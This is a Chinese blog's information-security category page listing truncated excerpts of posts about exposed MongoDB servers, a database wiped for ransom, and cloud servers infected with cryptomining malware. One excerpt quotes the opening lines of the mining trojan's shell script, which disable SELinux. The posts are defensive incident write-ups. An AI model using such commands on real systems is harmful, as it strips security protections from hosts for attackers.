随笔 - 313
文章 - 29
评论 - 32
阅读 -
124万
随笔分类 - 信息安全
mongodb获取到的可能已经沦为肉鸡的云服务器地址
摘要:测试方法: 1.将mongodb开放外网端口,放置24小时以上; 2.查看24小时内的访问日志; 可以看到的异常的连接和来自几个地方: 2020-07-31T04:40:05.983+0800 I NETWORK [thread1] connection accepted from 80.82.70
阅读全文
阿里云感染挖矿木马的脚本
摘要:运维发现阿里云被挖矿木马感染。 阿里云报的是ElasticSearch Groovy远程代码执行漏洞。 木马的脚本 如下: #!/bin/sh setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/
阅读全文
mongodb数据库被黑客删除数据的表现
摘要:前些日子看阿里云便宜,买了一个,安装了一个mongodb,自己连着做调试。 好久没用了,今天突然惊喜的发现被黑客登录了。没想到居然还有人靠这么低级的漏洞混饭吃。 被黑的表现如下: > show dis HOW_TO_RESTORE_mydb1 0.078GB HOW_TO_RESTORE_mydb2
阅读全文
记一次阿里云被植入挖矿木马的事件
摘要:今天上午同事说我负责的那个模块不工作了,我登录了一下阿里云服务器排查一下,发现服务器运行很慢。(因为你敲的命令字符回传的很快,但是命令的响应时间长,所以是服务器卡了,而不是网络的问题) 使用top查看一下,发现: [root@xxx ~]# top %Cpu(s): 99 us, 0.8 sy, 0
阅读全文
